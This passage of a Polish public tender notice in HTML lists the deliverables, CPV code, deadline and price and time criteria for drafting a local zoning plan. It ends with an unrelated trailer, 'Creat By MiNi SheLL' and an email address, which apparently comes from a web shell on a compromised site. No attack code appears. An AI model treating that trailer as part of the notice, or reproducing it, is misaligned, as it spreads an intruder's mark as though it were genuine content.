- prognoza skutków finansowych uchwalenia planu - 3 egz. oprawione; 
b)	2 płyty CD/DVD z zapisem niezabezpieczone przed kopiowaniem (standard plików .doc, .pdf, .xls) zawierające:
- tekst planu, prognozę oddziaływania na środowisko, prognozę skutków finansowych uchwalenia planu,
- rysunek planu w skali 1:1000, 
- rysunek planu pomniejszony czarno-biały do publikacji,
- rysunek planu pomniejszony kolorowy;
c)	wersja cyfrowa - 2 płyty CD/DVD.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia.
W przypadku gdyby wykonawca uznał, że zamawiający zawarł w opisie przedmiotu zamówienia wskazanie znaków towarowych, patentów lub pochodzenia zamawiający dopuszcza składanie ofert na wyspecyfikowane przedmioty - lub równoważne. Za równoważne zamawiający rozumie takie opracowanie wersji cyfrowej planu, której standard i rozszerzenia plików umożliwia prawidłową konwersję oraz odczytanie przez oprogramowanie do którego zamawiający posiada licencję..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com